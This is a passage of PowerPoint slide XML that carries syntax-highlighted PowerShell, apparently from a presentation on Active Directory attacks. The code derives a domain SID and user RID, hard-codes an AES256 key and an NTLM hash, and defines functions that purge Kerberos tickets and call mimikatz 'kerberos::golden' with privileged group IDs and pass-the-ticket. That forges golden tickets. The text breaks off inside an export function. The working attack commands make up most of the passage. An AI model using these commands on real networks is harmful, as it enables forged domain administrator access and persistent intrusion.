              <a:t>System.Security.Principal.SecurityIdentifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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800080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Security.Principal.NTAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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domainName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>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userRid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Translate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Security.Principal.SecurityIdentifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'-'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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aesKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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'ea808f6ccac8b3459acfdea46c172e3c07a6409f439832df353a23b3cfc68a6c'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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'76b510bf67dbc38562693e997704ce65'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</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New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GoldenTicketAesKey</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>klist</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purge</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /domain:</a:t>
            </a:r>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domainFqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /aes256:</a:t>
            </a:r>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aesKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /user:</a:t>
            </a:r>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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /id:</a:t>
            </a:r>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userRid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /groups:513,512,520,518,519,4554,3243243,3223 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>startoffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:-10 /endin:6000 /renewmax:10080"</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exit</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</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New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GoldenTicketNtlmHash</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>klist</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purge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /domain:</a:t>
            </a:r>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domainFqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /rc4:</a:t>
            </a:r>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ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /user:</a:t>
            </a:r>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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /id:</a:t>
            </a:r>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userRid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /groups:513,512,520,518,519 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>startoffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:-10 /endin:6000 /renewmax:10080"</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exit</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</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Export-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GoldenTicketNtlmHash</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008B"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Mandatory)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
